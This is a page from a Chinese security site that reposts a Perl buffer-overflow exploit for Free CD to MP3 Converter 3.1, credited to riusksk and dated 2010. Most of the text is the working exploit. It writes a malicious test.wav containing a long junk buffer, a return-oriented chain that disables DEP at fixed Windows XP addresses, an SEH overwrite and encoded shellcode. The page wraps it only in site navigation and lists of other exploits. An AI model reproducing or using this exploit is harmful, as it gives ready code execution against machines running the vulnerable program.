首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Free CD to MP3 Converter 3.1 Buffer Overflow Exploit (Bypass DEP + SEH)
来源:http://riusksk.blogbus.com 作者:riusksk 发布时间:2010-11-22  

# Exploit Title: £ºFree CD to MP3 Converter 3.1 Buffer Overflow Exploit (Bypass DEP + SEH)
# Origianl exploit by C4SS!0 G0M3S£ºhttp://www.exploit-db.com/exploits/15483/
# Modified by riusksk£¨http://riusksk.blogbus.com£©
# Test on Windows XP SP3 CN
# Data£º2010/11/20

#!/usr/bin/perl
my $junk1 = 'A'x 4112;

my $disabledep = "\x68\xdc\xec\x77";  # 0x77ecdc68 - push esp,pop ebp,ret 4,adjust ebp
$disabledep = $disabledep."\xea\x18\x97\x7c";  # 0x7c9718ea - set eax to 1 
$disabledep = $disabledep."\xff\xff\xff\xff"; # balance the stack
$disabledep = $disabledep."\x24\xcd\x93\x7c"; # 0x7c93cd24 - run NX Disable routine
$disabledep = $disabledep."\xff\xff\xff\xff"; # balance the stack

my $junk2 = 'B'x 24;    

my $nseh = "\x90\x90\xeb\x06";  # jmp 06
my $seh = "\x80\x14\x40\x00"; # pop pop ret, no safeseh
my $nops = "\x90\x90";    
my $shellcode =
"\xb8\xc7\xae\x8e\xae\xd9\xc7\x33\xc9\xb1\x31\xd9\x74\x24" .
"\xf4\x5b\x31\x43\x14\x83\xeb\xfc\x03\x43\x10\x25\x5b\x72" .
"\x46\x20\xa4\x8b\x97\x52\x2c\x6e\xa6\x40\x4a\xfa\x9b\x54" .
"\x18\xae\x17\x1f\x4c\x5b\xa3\x6d\x59\x6c\x04\xdb\xbf\x43" .
"\x95\xea\x7f\x0f\x55\x6d\xfc\x52\x8a\x4d\x3d\x9d\xdf\x8c" .
"\x7a\xc0\x10\xdc\xd3\x8e\x83\xf0\x50\xd2\x1f\xf1\xb6\x58" .
"\x1f\x89\xb3\x9f\xd4\x23\xbd\xcf\x45\x38\xf5\xf7\xee\x66" .
"\x26\x09\x22\x75\x1a\x40\x4f\x4d\xe8\x53\x99\x9c\x11\x62" .
"\xe5\x72\x2c\x4a\xe8\x8b\x68\x6d\x13\xfe\x82\x8d\xae\xf8" .
"\x50\xef\x74\x8d\x44\x57\xfe\x35\xad\x69\xd3\xa3\x26\x65" .
"\x98\xa0\x61\x6a\x1f\x65\x1a\x96\x94\x88\xcd\x1e\xee\xae" .
"\xc9\x7b\xb4\xcf\x48\x26\x1b\xf0\x8b\x8e\xc4\x54\xc7\x3d" .
"\x10\xee\x8a\x2b\xe7\x63\xb1\x15\xe7\x7b\xba\x35\x80\x4a" .
"\x31\xda\xd7\x53\x90\x9e\x26\xa5\x29\x0b\xbe\x1f\xd8\x76" .
"\xa2\xa0\x36\xb4\xdb\x22\xb3\x45\x18\x3a\xb6\x40\x64\xfd" .
"\x2a\x39\xf5\x6b\x4d\xee\xf6\xbe\x3e\x78\x09";

open($fp,">test.wav");
print $fp $junk1.$disabledep.$junk2.$nseh.$seh.$nops.$shellcode;
close $fp;


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Native Instruments Massive 1.1
·Minishare 1.5.5 Buffer Overflo
·Native Instruments Service Cen
·Windows Task Scheduler Privile
·Native Instruments Traktor Pro
·Native Instruments Kontakt 4 P
·Xion Audio Player 1.0.126 (.m3
·FreeNAS exec_raw.php Arbitrary
·Xion Audio Player 1.0.127 (m3u
·Xion Audio Player 1.0.126 Buff
·Netcraft Toolbar 1.8.1 Remote
·DATAC RealWin SCADA Server Buf
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved